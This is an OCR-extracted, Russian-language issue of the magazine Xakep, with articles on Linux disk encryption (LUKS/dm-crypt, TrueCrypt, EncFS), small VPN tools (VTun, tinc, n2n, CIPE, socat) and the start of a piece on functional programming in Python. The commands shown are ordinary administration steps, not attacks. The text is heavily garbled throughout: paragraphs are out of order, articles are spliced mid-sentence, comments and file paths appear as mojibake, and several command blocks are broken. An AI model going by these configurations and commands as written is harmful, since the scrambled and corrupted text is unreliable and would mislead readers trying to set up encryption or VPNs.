сложное. При создании шифрованной флешки специальные записи в /etc/crypttab и /etc/fstab не требуются. а затем корректно отключать их во время шатдауна. Интересная особенность LUKS/dm-crypt заключается в возможности использования сразу нескольких ключей шифрования (а значит. и паролей) для одного дискового устройства. достаточно добавить по одной строке в файлы /etc/crypttab и /etc/fstab: $ sudo -i # echo "èìÿ /dev/sda5 none luks. Новые ключи добавляются в LUKS с помощью действия luksAddKey утилиты cryptsetup: $ sudo cryptsetup luksAddKey /dev/sda5 Команда попросит тебя ввести текущий пароль. которые можно использовать для хранения важной информации: # dd if=/dev/urandom of=luks. Опция '-s' задает длину ключа шифрования в битах.

и том появится в списке подклю- 101 .0 с графическим интерфейсом как для Windows. ввод полного пути до файла тома или выбор устройства.д. В связи с лицензионными проблемами (при всей открытости исходного кода лицензия TrueCrypt была признана несвободной ведущими производителями дистрибутивов) TrueCrypt был исключен из многих дистрибутивов. TrueCrypt в первую очередь предназначена для шифрования образов ФС. После того.3a-linux-x86.д. Вовторых. когда была выпущена TrueCrypt 5. как том будет создан. в отличие от первой. что очень полезно при шифровании swap-разделов: Главное окно TrueCrypt и один смонтированный образ # swapoff -a # cryptsetup -d /dev/urandom create cryptoswap /dev/sda1 # mkswap /dev/mapper/cryptoswap -L accessisdenied -v1 # echo "cryptoswap /dev/sda1 /dev/urandom swap" >> /etc/crypttab # echo "/dev/mapper/cryptoswap none swap sw 0 0" >> /etc/fstab # swapon -a Вместо пароля ты можешь использовать ключевой файл.3a-setup-x86 В процессе установки необходимо прочитать и согласиться с лицензией и ввести свой пароль в системе (или пароль рута). открыть существующий том и т. В-третьих.3a-linux-x86. ввод размера тома. ввод пароля для доступа.truecrypt. использует fuse для монтирования зашифрованных устройств/образов. TrueCrypt умеет создавать скрытые шифрованные тома внутри XÀÊÅÐ 10 /141/ 10 уже существующих томов. Для этого создай случайный ключ с помощью dd: $ dd if=/dev/urandom of=/ïóòü/ê/ôàéëó bs=512 count=4 А затем используй его при инициализации LUKS-раздела: $ sudo cryptsetup luksFormat -c aes-xts-plain -s 256 \ /dev/sda5 /ïóòü/äî/êëþ÷à Для «открытия» раздела используй следующую команду: $ sudo cryptsetup -d /ïóòü/äî/êëþ÷à luksOpen \ /dev/sda5 èìÿ TRUECRYPT Открытая система шифрования дисков TrueCrypt появилась для систем Windows еще в 2004 году.tar. TrueCrypt создает тома такими. включая выбор носителя (файл или раздел). Так же. версии ПО есть для Windows. захламляя систему неуправляемыми пакетным менеджером файлами (которые. поэтому его придется скачивать и устанавливать самостоятельно: $ cd /tmp $ wget http://www. Он проведет тебя через все шаги создания зашифрованного тома. После установки запускаем команду truecrypt и видим перед собой графический интерфейс. После нажатия на кнопку «Create Volume» ты попадешь в мастер создания томов. их ядро абсолютно одинаково.sh). Mac OS X и Linux. но может быть использована и для шифрования целых разделов. так и для Linux. в верхней части располагается стандартное меню. смонтировать. но. TrueCrypt по-настоящему кроссплатформенна.tar. поэтому никаких проблем при переносе образов между системами возникнуть не может (для чтения LUKS-разделов под Windows есть программа FreeOTFE. В-четвертых.org/download/truecrypt6.gz $ tar -xzf truecrypt-6. как было описано выше. выбор файловой системы (FAT. правда. типа тома (обычный или скрытый)./truecrypt-6. Linux-версия TrueCrypt опирается на подсистему dm-crypt. что их невозможно отличить от случайных данных.gz $ . После этого TrueCrypt будет установлен в каталог /usr. выбор алгоритма шифрования и хеширования ключей. однако и у нее есть свои сильные стороны. причем делает это так. которая стала полноценной в 2008 году. а снизу — основные элементы управления программой: создать том (Create Volume). могут быть удалены с помощью команды truecrypt-uninstall. TrueCrypt позволяет менять пароли или файлы ключей для тома без потери данных (LUKS требует пересоздания тома). добавляет к любому тому заголовок.Форматирование образа TrueCrypt LUKS/dm-crypt è îäíîðàçîâûå êëþ÷è LUKS/dm-crypt также умеет использовать одноразовые ключи. Во-первых. и уже через год в нее была добавлена поддержка Linux (версия 4. что полезно при сокрытии информации (LUKS. размонтировать. его можно найти с помощью кнопки «Select File» в нижней части окна программы.0). что формально нельзя доказать их наличие. но за ее поддержку отвечают сторонние разработчики). Основное пространство окна занимает список смонтированных шифрованных образов/разделов. сохраненный на USB-брелке или любом другом носителе информации. по которому его легко найти). как и LUKS. Это оставляет свой отпечаток на производительности и делает TrueCrypt более медленной в сравнении с LUKS. Все просто и понятно. Ext2 или Ext3) и т. ввести пароль доступа.

а decrypted — использоваться просто как точка монтирования для нее же: $ cd /tmp $ mkdir crypted decrypted Подключим к каталогам EncFS: $ encfs /tmp/crypted /tmp/decrypted Текстовый режим работы TrueCrypt ченных томов. Ты просто запускаешь команду «truecrypt -t -c» и отвечаешь на все те же стандартные вопросы. Twofish и Serpent. Их всего два: expert (буква «x») и paranoid (буква «p»). активируемый с помощью флага '-t'. для этого подойдет любой каталог. С другой стороны. То есть 4096 байт для x86. Также система по дефолту устанавливает блок данных ФС равным 1024 байт. Я бы рекомендовал использовать LUKS/dm-crypt или loop-aes для повседневного использования и прибегать к помощи TrueCrypt. хотя лучшую производительность EncFS показывает при установке размера блока равным размеру страницы оперативной памяти. режим expert открывает некоторые возможности для оптимизации. обладающая всеми присущими криптосистеме функциями/свойствами и поддерживаемая из коробки самыми популярными дистрибутивами. кроме поддержки фреймворка fuse в ядре.encfs» и заканчивающийся номером версии. что. что это такое. В качестве алгоритмов шифрования могут быть использованы алгоритмы AES. Более того. здесь есть стандартная реализация под названием LUKS/dm-crypt.д. Клик на томе автоматически откроет стандартный файловый менеджер. EncFS создала небольшой скрытый файл. хотя для большинства пользователей режим paranoid будет более правильным выбором. Стоит сказать. когда зашифрованный одним алгоритмом блок данных повторно шифруется другим. fusermount -u /tmp/decrypted cd crypted ls для размонтирования используется флаг '-d': $ truecrypt -d Замечу. По окончании будет создан образ (или TrueCrypt'ный том внутри раздела). В качестве примера создадим два пустых подкаталога в /tmp: директория crypted будет содержать данные после их шифрования с помощью EncFS. просто потому что нелегален для частного использования в некоторых странах. Перейдем в каталог decrypted и создадим несколько файлов: $ $ $ $ cd decrypted echo qwerty > file1 echo asdfgh > file2 echo zxcvbn > file3 Отключим EncFS и взглянем на результат: $ $ $ $ cd . ни один из них еще не был скомпрометирован. алгоритм Blowfish быстрее AES. Для инсталляции EncFS достаточно установить пакет с одноименным названием: $ sudo apt-get install encfs 102 Как видишь. такие как опции шифрования (алгоритм. как Initialization Vector (если ты не знаешь. Но вернемся к нашему зашифрованному каталогу. но оставила почти все метаданные на виду. когда другие системы не могут быть использованы (например. такие вещи. Выбрав первый вариант. Первый вопрос: выбор режима работы EncFS с пользователем. которые уделывают ее по нескольким характеристикам. начинающийся с «. заголовки MAC (Message authentication code) и размер блоков шифрования. который мы использовали при создании зашифрованных разделов с помощью LUKS. когда необходимо создать кроссплатформенный том. OpenSSL и небольшой библиотеки для логирования. z XÀÊÅÐ 10 /141/ 10 . шифрованный бэкап). длина ключа). но он не используется по умолчанию. Не каждый пользователь будет рад графическому интерфейсу. В последней версии программы используется все тот же режим шифрования XTS. можешь жать <Enter> для выбора ответа по умолчанию) и т. Файл содержит в себе метаданные. С одной стороны. Так что однозначный выбор сделать трудно. Например. ЧТО ЛУЧШЕ? Ситуация с шифрующими системами в Linux весьма неоднозначна. После окончания работы можно нажать «Dismount All» и выйти из программы. В режиме paranoid программа сама ответит на свои вопросы и предложит ввести пароль для доступа к данным. длину ключа. поэтому у TrueCrypt есть еще один тип интерфейса: интерактивный текстовый режим. Кроме того. и EncFS. TrueCrypt позволяет использовать так называемые каскады алгоритмов. у LUKS/dm-crypt есть серьезные конкуренты. ENCFS Виртуальная файловая система EncFS распространяется в виде обычного дистрибутивного пакета и не требует для своей работы ничего. Создание тома в этом режиме очень похоже на создание тома с использованием графического мастера. что TrueCrypt совсем не уступает LUKS по степени обеспечения безопасности зашифрованных данных.. libfuse. ты сможешь задать алгоритм шифрования (AES или Blowfish). который можно подключить с помощью следующей команды: $ truecrypt -t /ïóòü/äî/îáðàçà /òî÷êà/ìîíòèðîâàíèÿ Теперь необходимо ответить на несколько вопросов. EncFS полностью скрыла имена и данные файлов.UNIXOID Создать зашифрованную с помощью EncFS файловую систему очень просто.

позже их можно переопределить для каждого клиента: $ sudo nano /etc/vtund. Посмотрим. а ты не можешь поучаствовать в баталиях из-за того. Знакомство с сайтом проекта (vtun. требующий предварительной правки. что туннель не будет постоянным. В поставке уже идет готовый шаблон файла. каждый из которых будет считывать свой конфиг и работать в качестве сервера или клиента. главным требованием выдвинем простоту в настройках и нетребовательность к ресурсам. # îïèñûâàåì ïóòè ê èñïîëüçóåìûì ïðî- 103 . что его не списали со счетов. Система работает через универсальные драйверы tun и tap. эта особенность и привлекает пользователей. VTUN Очень популярная программа.in. *BSD и Solaris. 200 201007-10 12:39 /dev/net/tun Если ядро пересобиралось самостоятельно. SLIP. Нужные устройства. Если клиент находится за NAT. для чего используются библиотеки OpenSSL. Все возможные параметры можно найти в документации VTun. Секции options и default являются общими для всех. Предусмотрена компрессия потока при помощи библиотек zlib и lzo. На одном из хостов программа запускается как сервер (слушает 5000 порт). и сегодня VTun доступен в репозиториях большинства *nix систем: Linux.ua Ñàìûé ìàëåíüêèé VPN Âûáèðàåì ïðîñòîå è ëåãêîâåñíîå VPN-ðåøåíèå Если в соседней локалке во всю шпилятся в одну из популярных сетевых игр.UNIXOID Сергей «grinder» Яремчук grinder@tux. а на остальных — как клиент. Ethernet. выход один — поднять VPN. простота и гибкость настроек привели к тому. тогда не забудь включить опции CONFIG_TUN и CONFIG_ETHERTAP. либо админы намудрили с ограничениями. уже созданы в системе: $ ls -al /dev/net/tun crw-rw-rw. Пример для Debian/Ubuntu: $ sudo apt-cache search vtun vtun . Количество клиентов ограничивается только мощностью сервера. sf. Потоки кодируются 128-битным ключом по алгоритму BlowFish. PPP. В качестве транспортного протокола может использоваться на выбор TCP или UDP.conf options { port 5000. что гама рассчитана только на LAN. syslog daemon. Устанавливаем пакет vtun в Debian/Ubuntu: $ sudo apt-get install vtun Все настройки демона производятся в файле /etc/vtund. что предлагает нам OpenSource. VTun использует клиент-серверную архитектуру. При этом настройки VTun позволяют при необходимости ограничить скорость туннелей. Учитывая. позволяющие программам в окружении пользователя (userspace) самостоятельно обрабатывать пакеты. VTun позволяет ему без проблем подключаться к серверу. поэтому можно выбрать оптимальный вариант между нагрузкой на CPU и загрузкой канала. как правило. Уровень сжатия XÀÊÅÐ 10 /141/ 10 также поддается регулировке. Можно запустить несколько демонов. позволяющая быстро создать виртуальный туннель через TCP/IP сети. чтобы равномерно распределить загрузку канала.net) обнажает главный недостаток VTun: он не развивается вот уже три года (последнее обновление датировано 6 декабря 2007 года). Собственно. Но нетребовательность к системным ресурсам.1 root root 10.conf. Настройки внутри разбиты на несколько разделов.virtual tunnel over TCP/IP networks VTun поддерживает несколько типов виртуальных туннелей — IP. для этого следует лишь использовать в качестве транспорта TCP. TTY и pipe.

лучше ввести: $ sudo vtund -s Клиент настраивается аналогично.1. firewall /sbin/iptables. timeout 60.net • Сайт проекта tinc — tinc-vpn. ip /sbin/ip. tty.0. которые должны быть выполнены в процессе разрыва VPN.inka. ifconfig /sbin/ifconfig.1. proto udp. encrypt yes. чтобы init-файл знал. чтобы получить больше информации.0.0.1. кроме настроек интерфейса.org/n2n • Страничка socat — www. кого запускать. поэтому. # speed 256:128. keepalive yes. } default { compress lzo:9. } И если ты используешь Debian-based дистрибутив. 104 $ sudo nano /etc/default/vtun # äëÿ ñåðâåðà RUN_SERVER=yes Теперь можно запускать сервер: $ sudo invoke-rc.d vtun start Или на первых порах.mydomain.ru Для начала запустим vtund с указанием имени клиентского хоста. # êîìàíäà ïðè îòêëþ÷åíèè (íåîáÿçàòåëüíàÿ) down { firewall "-t nat -F".1.0.2 mtu 1450 # ïðè íåîáõîäèìîñòè ïðîáðàñûâàåì ñîåäèíåíèå # firewall "-t nat -A POSTROUTING -s 10. позволяющих создавать автоматический бэкап важных данных. ether. и IP-адреса (имени) сервера: XÀÊÅÐ 10 /141/ 10 .UNIXOID Ищем нужные пакеты в репозитории Ubuntu В Debian/Ubuntu для удобства управления предлагается файл /etc/default/vtun.org • Страница проекта n2n — ntop. # óðîâåíü ñæàòèÿ speed 0.html ãðàììàì ifconfig /sbin/ifconfig.1. type tun. Команды могут быть любые.3. поправь / etc/default/vtun. # îãðàíè÷åíèå ïîëîñû } # òåïåðü îïèñûâàåì êëèåíòîâ client1 { passwd p@ssVV0rD. параметры. }.1. âûïîëíÿåìàÿ ïðè ïîäêëþ÷åíèè up { ifconfig "%% 10. } client1 { passwd p@ssVV0rD. route /sbin/route. # êîìàíäà.conf options { port 5000.2.1". # òèï ìîæåò áûòü: tun. Например. где описать настройки. up { ifconfig "%% 10. pipe type tun.2 -j MASQUERADE". } Аналогично секции up можно создать секцию down. route "add -net 1. по сути. ifconfig "%% down".0. При настройке сервера достаточно изменить внутри одну строку: Конфигурационный файл VTun HTTP://WWW links • Сайт проекта VTun — vtun. org/socat/ • Проект CIPE — sites.0. route /sbin/route. зеркальны серверным: $ sudo nano /etc/vtund. }.1 pointopoint 10. }. $ sudo nano /etc/default/vtun CLIENT0_NAME=client1 # IP èëè èìÿ VTun ñåðâåðà CLIENT0_HOST=vtun.sf.2 pointopoint 10.de/bigred/ devel/cipe. firewall /sbin/iptables. так: program /bin/sh "-c 'tar cf ./etc/*'". фигурирующего в конфиге.4/16 gw 10.dest-unreach. сюда можно прописать пару строк.1 mtu 1450".

boot прописываются названия сетей.tinc (tinc-vpn. если он занят или блокируется файером. Для шифрования потока задействуется OpenSSL. tinc позволяет соединить между собой компьютеры через IPv4/IPv6 сети. описываются в файле tinc. Данные о конкретных узлах сети прописываются в подкаталоге hosts.mydomain. Чтобы добавить новый мост. Кроме того. Также tinc предоставляет возможность соединить вместе несколько Ethernet сегментов. $ sudo nano /etc/tinc/vpnnet/hosts/vpn01 Address = vpn01. èñïîëüçóåòñÿ äëÿ ìàðøðóòèçàöèè Subnet = 192. играть в игры.org). чтобы потом не путаться. необходимо создать конфигурационные файлы.conf # ñèìâîëè÷åñêîå èìÿ ïîäêëþ÷åíèÿ Name = my_vpn # êîìïüþòåð. активные разработки ведутся до сих пор.ru По умолчанию tinc использует порт 655. *BSD. Генерируем ключ: $ sudo tincd -n vpnnet -K 105 . Windows 2k-Se7en. сгенерировать пару ключей и распространить их на компьютеры.priv # åñëè íåñêîëüêî ñåòåâûõ êàðò BindToInterface = eth1 # ïàêåòû. Чтобы все заработало. то его можно изменить. tinc требует наличия драйверов TUN/TAP.2. экспериментально поддерживается работа и на таких девайсах. достаточно создать еще один конфигурационный файл. Конфиг в наличии пока только один.4 # ëîêàëüíàÿ ñåòü. Если VPN-сеть одна.0/24 # èñïîëüçîâàíèå TCP # TCPOnly = yes Второй файл практически аналогичен.conf: $ sudo tail -f /var/log/message Команда ifconfig покажет наличие tun0 интерфейса. такое распределение по каталогам XÀÊÅÐ 10 /141/ 10 $ sudo nano /etc/tinc/vpnnet/tinc. например. êîòîðûå íå ìîãóò ïðîéòè íàïðÿìóþ. В файле /etc/tinc/net.mydomain. в другой консоли смотрим логи: необязательно (все конфиги тогда размещаем в корне /etc/tinc). указав нужное значение в параметре Port. в файлах узлов хранится публичный ключ (заносится автоматически при создании).d vtun start TINC Следующий претендент на звание самого маленького и самого простого в настройках VPN . По мере необходимости копируем их в /etc/tinc и правим. В дальнейшем клиента можно запускать обычным образом через init-скрипт: $ sudo invoke-rc. в нашем примере мы должны создать два файла: my_vpn и vpn01. В отличие от VTun. но лучше использовать одно имя.168. как iPhone. На этом настройку Vtun можно считать законченной. что позволяет. Кроме того. именно здесь демон будет искать настройки сети vpnnet. Режим VPN и удаленный узел. Solaris. Чтобы иметь возможность подключаться сразу к нескольким VPN-сетям. áóäóò îòáðîøåíû # DirectOnly = yes # ïåðåíàïðàâëåíèå ïàêåòîâ # Forwarding = <off|internal|kernel> На самом деле все параметры не нужны.conf Генерируем ключевую пару для работы tinc $ sudo vtund -ð client1 vtun. Например. доступные только в локальной сети. но делать ему сейчас нечего. ê êîòîðîìó ïîäêëþ÷àåìñÿ # âîçìîæíî çàäàíèå íåñêîëüêèõ ConnectTo ConnectTo = vpn01 # óñòðîéñòâî Device = /dev/net/tun # ðåæèì VPN: router|switch|hub Mode = switch PrivateKeyFile = /etc/tinc/vpnnet/rsa_key. в нашем случае это /etc/tinc/ vpnnet.3. к которому будем подключаться.Установки в tinc. добавим сюда нашу будущую сеть: $ sudo nano /etc/tinc/net. возможно сжатие с помощью zlib или lzo. участвующие в подключении. Так же. $ sudo nano /etc/tinc/vpnnet/hosts/my_vpn # IP àäðåñ èëè èìÿ óçëà Address = 1. Он пуст (комментарии не в счет). которые должны быть запущены tinc. Пакет с tinc доступен в репозиториях большинства дистрибутивов.boot vpnnet В /usr/share/doc/tinc/examples ты найдешь примеры конфигов. В Debian/Ubuntu вводим: $ sudo apt-get install tinc После установки стартует демон.1. iPod. как и VTun. Mac OS X. поэтому в примере оставлю только адрес. работающие под управлением самых разных ОС: Linux. Стартовал проект достаточно давно (в 1998 году). Установочный пакет для Windows можно скачать на офсайте. В самых простых случаях достаточно оставить первые пять директив. В пределах одной VPN сети ее название необязательно должно быть уникальным на всех системах-участниках.ru Следим за процессом подключения. следует расположить их настройки в «своих» подкаталогах.

Основными являются: -a — ñâîé IP-àäðåñ. не используют в угоду меньшему потреблению системных ресурсов. ntop. К сожалению. Если что-то пошло не так.2.1. Вводим на каждом: node1$ sudo edge -a 10. Если пароли совпадают. Для организации туннеля в Linux. пароли указываются в командной строке. Причем в обязанности supernode не входит функция авторизации. -f — çàïóñòèòü ïðîöåññ â âèäå äåìîíà. subnet-up/subnet-down.1 -c mynetwork -k encryptme -l 1.168. можно запускать: $ sudo /etc/init. êîòîðûé äåêëàðèðóåò êëèåíò äëÿ ïîäêëþ÷åíèÿ ê VPN-ñåòè. Процессом установления связи управляет специальный узел supernode. то есть никаких учетных данных для соединения он не содержит. команда ifconfig покажет новое соединение. Конечный компьютер (Edge Node) может одновременно быть подключен к нескольким таким сетям. команды.2.2 -c mynetwork -k encryptme -l 1. Все. -r — àêòèâèðîâàòü ôîðâàðäèíã/ðîóòèíã ïàêåòîâ (ýòà ôóíêöèÿ ïîçâîëÿåò ïîäêëþ÷èòüñÿ íå òîëüêî ê Edge Node. -k — êëþ÷ äëÿ ïîäêëþ÷åíèÿ ê VPN-ïîäñåòè. На первых порах для получения более подробной информации лучше использовать ключ '-v'. С точки потребления трафика держать подобный туннель постоянно открытым довольно накладно (все время идет обращение к supernode). клиенты сами договариваются между собой после подключения. Надо сказать.3.1. обеспечивающие поднятие/остановку нужного интерфейса и маршрутизацию при включении VPN: tinc-up/tinc-down. параметров у нее больше. введенные на разных узлах. Обмен происходит при помощи UDP-пакетов. поэтому их легко подсмотреть в хистори.255.255.1. Как видишь. поэтому его используют для кратковременных сеансов. Обрати внимание: права суперпользователя не требуются. и шифрование часто вообще 106 $ sudo apt-get install n2n $ supernode -l 7654 -v Для подключения к VPN-сети используется команда edge. Так. запускаем демона в режиме отладки: $ sudo tincd -n vpnnet -d5 -D N2N Проект N2N (network to network.org/n2n) предлагает решение. для которых безопасность не является основным критерием при выборе VPN. при необходимости клиент запускают отдельно. Например. на котором демон будет принимать подключения. -ñ — íàçâàíèå âèðòóàëüíîé ïîäñåòè. *BSD.0 После чего в системе появятся два исполняемых файла — supernode и edge.d/tinc start Процесс подключения будет отображен в логах.4:7654 В консоли получаем сообщение «Registering with supernode». поэтому участники после подключения отправляют информацию напрямую. Никаких конфигов N2N не использует. команда ifconfig покажет наличие интерфейса edge0 с указанными выше параметрами. отличаются лишь объявляемым IP. не все они обязательны.3. когда Edge Node не могут взаимодействовать напрямую.2. в N2N есть минусы и с точки зрения безопасности.10 netmask 255. -l — äàííûå supernode. Windows (доступен GUI) и OpenWRT задействуются TUN/TAP-драйвера. Для обмена данными используется P2P-архитектура. позволяющее создать VPN-соединение между двумя и более сетями. Mac OS X. íî è ê óäàëåííîé ñåòè). Установка в Debian/Ubuntu проста: $ sudo nano /etc/tinc/vpnnet/tinc-up #!/bin/sh modprobe tun ifconfig $INTERFACE 192. зарегистрируем на supernode два узла node1 и node2. Supernode не совмещает в себе функции Edge Node.2. куда сохранить приватный и публичный ключи. Опять же.4:7654 node2$ sudo edge -a 10. N2N особенно полюбился любителям игр. Также для каждой сети следует настроить скрипты. он же используется как промежуточный в тех случаях.UNIXOID Запускаем supernode в отладочном режиме Единственной документацией на anytun являются man-страницы В процессе работы скрипт спросит. указав в качестве параметра '-l' порт. -d — óêàçàòü TAP-óñòðîéñòâî (ïîëåçíî ïðè îäíîâðåìåííîé XÀÊÅÐ 10 /141/ 10 . происходит поднятие VPN. Запускаем supernode. host-up/subnet-down. Также в командной строке можно указать: -h — èñïîëüçîâàòü HTTP-òóííåëü (ýêñïåðèìåíòàëüíàÿ âîçìîæíîñòü). Такой подход упрощает работу в случае недоступности одного из supernode — просто выбираем другой и подключаемся через него.

И хотя она уже давно не развивается (с января 2004 года). файловый дескриптор. позволяющая установить TCP/UDP-соединение с нужными параметрами. Активируем сервер: ðàáîòå ñ íåñêîëüêèìè ñåòÿìè). Шифрованные при помощи протокола CIPE (текущая версия CIPEv3) IP-пакеты инкапсулируются в UDP-датаграммы. В репозитории Debian/Ubuntu программы нет.dest-unreach. но установка стандартна. Mac OS X и Cygwin.inka. а используя SSL — защитить соединение между двумя socat. справочная информация на сайте проекта только на немецком. На просторах интернета можно найти еще как минимум десяток реализаций. raw). который найдешь в архиве.168. где провайдеры блокируют протоколы GRE или любые нестандартные порты. которые помогают быстро и без лишних телодвижений поднять VPN.tar. Единственный минус для клиента.cert=/ etc/vpn/client.tgz — 535 Кб socat-1. OpenSolaris. для обхода файера и так далее.crt Осталось добавить. обычно это положительно сказывается на безопасности конечного решения. Данные шифруются динамическими 128-битными ключами (Blowfish.cert=/etc/vpn/ server.ru:4444.tar. Изначально CIPE разработан с учетом применения в Linux.6. Официально поддерживаются 32-битные версии Linux и Windows. которая так и называется — P2PVPN (p2pvpn. Для примера поднимем TUN-сервер.gz — 860 Кб Anycast Популярность VoIP и подобных сервисов сегодня высока как никогда. доступны все варианты использования программы.0.z 107 . ведь пакет в любом случае дойдет до «кого-нибудь» из группы серверов.0. UNIX.2.reuseaddr. разработан и получил название SATP (Secure Anycast Tunneling Protocol).org/socat/) обеспечивает двустороннюю переXÀÊÅÐ 10 /141/ 10 $ sudo socat openssl-listen:4444. Для аутентификации используется RSA (1024 бит). Поддерживается автоматическая маршрутизация при помощи Quagga.tar. TCP. Win2k (cipewin32. программа и другие. использование UDP позволяет anycast «дружить» с NAT. Сам протокол CIPE открыт и документирован.tar.168. Надеюсь. как шелл к Unix-сокету. при необходимости используется сжатие. Стоит отметить.13. Использование SSL также не вызывает сложностей.pem. результирующий пакет включает информацию о получателе. Минус — проект практически прекратил свое развитие (последнее обновление было в 2002 году).de/bigred/ devel/cipe. дачу данных между двумя различными каналами данных: сокет (UDP. Основная ее особенность — возможность работы без центрального сервера. Чтобы работать через VPN с anycast. в более новых релизах пользователям CIPE приходится собирать его самостоятельно. что socat поддерживает Linux. С ее помощью можно легко настроить прокси и подключаться к удаленному сервису.tar. описывающий принцип соединения unicast и anycast-сетей. В файле EXAMPLES. работающего через VPN — при недоступности одного сервера он вынужден подключаться к другому. *BSD. Так. псевдотерминал.gz — 122 Кб cipe-1. следует выбрать netcat.2.reuseaddr TUN:192.1. нужен специальный протокол. Написана на Java и теоретически может быть запущена на любой платформе. Anycast-рассылка позволяет клиенту не беспокоиться о работоспособности конкретного сервиса. ЗАКЛЮЧЕНИЕ Рассмотреть все предложения в рамках одной статьи невозможно. Принцип работы CIPE (Crypto IP Encapsulation.net). Еще один из немаловажных плюсов CIPE — его «дружба» с NAT и SOCKS.up Команда «ifconfig tun0» покажет наличие рабочего интерфейса. что часто используется при организации подключения из труднодоступных мест.tar. среди представленных вариантов ты уже нашел наиболее подходящий. Реализация SATP и лежит в основе проекта anytun (anytun.1. и такой протокол.crt echo Подключаемся клиентом: $ sudo socat stdio openssl-connect:example.0. IP4.1/24. sites.3. socat. поэтому CIPE убрали из репозиториев многих дистрибутивов.255. трафик шифруется при помощи AES (128 бит). очевидно. Так. IDEA). Пакет доступен в репозиториях основных дистрибутивов. К сожалению. IP6. указав в параметре TCP-адрес и порт удаленной системы: $ socat TCP:1.gz — 497 Кб n2n_svn_23072010.1. что.org). если ему нужна утилита.gz — 110 Кб vtun-3. Например.up Подключаемся к нему с другого компьютера.4:5555 TUN:192. Пользователи обычно применяют socat в качестве TCP-прокси для соксификации приложений. но доступен порт сторонних разработчиков для WinNT4. имеется реализация P2P VPN.org). там.sf. а также их комбинация.3.gz — 139 Кб tinc-1.pem.06 (Dapper Drake).cafile=/etc/vpn/server. как это можно сделать. Ncat.gz — 542 Кб openvpn-2. ответвления (форки) возникают с завидной регулярностью: OpenBSD netcat.1.7.1. Сейчас рассмотрим.0 SP3/SP6.CIPE Скриншот от редактора: настройка сервера OpenVPN для сетевой игры в HMM3 Ñàìûé ìàëåíüêèé VPN anytun-0. Cryptcat. передавать/принимать данные. для которой доступна Java RE. Обмен происходит через виртуальное устройство cipcbx. С его помощью легко соединить два узла.html) очень прост. поэтому при настройке альтернативы man просто нет. который будет слушать порт 5555: $ sudo socat -d -d TCP-LISTEN:5555.3.2/24. СЕМЕЙСТВО NETCAT — SOCAT Любой юниксоид знает. socat (www. в Ubuntu пакеты cipe-common и cipe-source были доступны еще в версии 6.cafile=/etc/vpn/client.

2). ÏÀÐÀÄÈÃÌÛ Как ты уже догадался. Erlang. или объектно-ориентированным (как во втором). наверное. Ýòîò ïîèñòèíå ìîùíûé ÿçûê ïîçâîëÿåò ïèñàòü êîä. на одном и том же языке можно писать. ÊÀÊÈÅ ÏÀÐÀÄÈÃÌÛ?! ÄÀÂÀÉÒÅ ÊÎÄÈÒÜ! Когда тебе надо написать что-то. ну.. что C++ «заточен» под эти парадигмы. код будет или императивным (как в первом случае). } void print_area() { 108 cout << "Ïëîùàäü: "<< this->area() << endl. Языки: Почти все Абсолютно понятная любому программисту парадигма: «Человек дает набор инструкций машине». } А можно и так: Площадь круга (вариант второй) class Circle { double r. Языки: Haskell. Èìïåðàòèâíîå ïðîãðàììèðîâàíèå «Сначала делаем это. но только как не старайся. наше дело — программить :). è êàêîé èç íèõ ëó÷øå ñëåäîâàòü. следуя нескольким парадигмам. Рассмотрим пример. программируя. Можно написать так: Площадь круга (вариант первый) double area_of_circle(double r) { return M_PI*pow(r. в зависимости от прямоты рук).CODING Александр Краснощеко в akrasnoschekov@gmail. а просто потому.. посчитаем площадь круга. ведь без этих знаний ты никогда не сможешь считать себя профессиональным кодером. причем иногда даже нескольким сразу.. } }. что с его помощью можно сделать — это смешать несколько парадигм. ты обязательно следуешь какой-либо парадигме. да и о работе в команде тебе тоже. } double area() { return M_PI*pow(this->r. ты либо выбираешь наиболее подходящий язык. затем вот это». Это происходит не из-за отсутствия воображения. } int main() { double r = 5. либо сразу начинаешь кодить на своем любимом. Попробуем написать что-нибудь простое.com ÊÎÄÈÌ ÍÀ PYTHON ÏÎ-ÔÓÍÊÖÈÎÍÀËÜÍÎÌÓ Ïîçíàåì ñèëó ôóíêöèîíàëüíîé ïàðàäèãìû ïðîãðàììèðîâàíèÿ ßçûê Python íå çðÿ ïîëüçóåòñÿ ïîïóëÿðíîñòüþ â ñðåäå ïðîãðàììèñòîâ Ãóãëà è ðåäàêòîðîâ Õàêåðà îäíîâðåìåííî :).. ñëåäóÿ íåñêîëüêèì ïàðàäèãìàì. скорее всего.2). И лучшее (или худшее. какую парадигму программирования выбрать. public: Circle(double r) { this->r = r. è ñåãîäíÿ ìû ïîïðîáóåì ðàçîáðàòüñÿ. например. Оно и верно. придется забыть. cout << "Ïëîùàäü: "<< area_of_circle(r)<< endl. Скорее. С императивной парадигмы все начинают учить/понимать программирование. Ôóíêöèîíàëüíîå ïðîãðàììèðîâàíèå «Считаем выражение и используем результат для чего-нибудь еще». И все-таки. потом это.} Можно и по-другому. пусть об идеологии думают идеологи. â ÷åì æå ìåæäó íèìè ðàçíèöà. Рассмотрим основные их представители. предпочитаемом и годами проверенном. то ты. F# XÀÊÅÐ 10 /141/ 10 . меньше всего заморачиваешься относительно того. int main() {(new Circle(5))->print_area().

Журнал по теме. HTTP://WWW links • Несколько хороших ресурсов для тех. floats(X) <= sameweight(duck. XÀÊÅÐ 10 /141/ 10 ÄÂÓËÈÊÈÉ ÏÈÒÎÍ Нет лучшей теории. burns(X) <= wooden(X). Языки: Почти все Появившись. Я уже привел пример аппликации в предыдущем листинге. с функциональным программированием в чистом виде мы сталкиваемся редко. в то же время. И вся соль функционального программирования в том. X). Полностью функциональные языки используются для всякого рода научных приложений и пока не получили большого распространения.org http://en. не расстраивайся — ты можешь успешно применять идеи функционального программирования и в других языках высокого уровня. наоборот. Мы описываем не последовательность состояний (как в императивной парадигме). а переменные служат для хранения этого состояния. что здесь формула — это инструмент. Ознакомимся с ними подробнее. предусматривает последовательность действий над данными. чем практика..html INFO info Если тебе не приглянулся питон. кому хочется узнать больше: http://www. то отдельные идеи перекочевали из них в скриптинговые (и не только) языки программирования. wooden(X) <= floats(X). объектно-ориентированная парадигма прочно вошла в нашу жизнь. концепции ФП реализованы в Питоне более чем изящно. А еще лучше — напишем на питоне :). В то время. Но если сами «функционалы» и не получили широкого распространения. не правда ли?). org/wiki • Programming_ paradigm http://www. Функциональное программирование противопоставляют императивному. что совершенно необязательно писать полностью функциональный код. который мы применяем к иксу. а потом подставляем x и получаем результат. Это не случайность. Императивное программирование подразумевает последовательность изменений состояния программы. Îáúåêòíî-îðèåíòèðîâàííîå ïðîãðàììèðîâàíèå «Обмениваемся сообщениями между 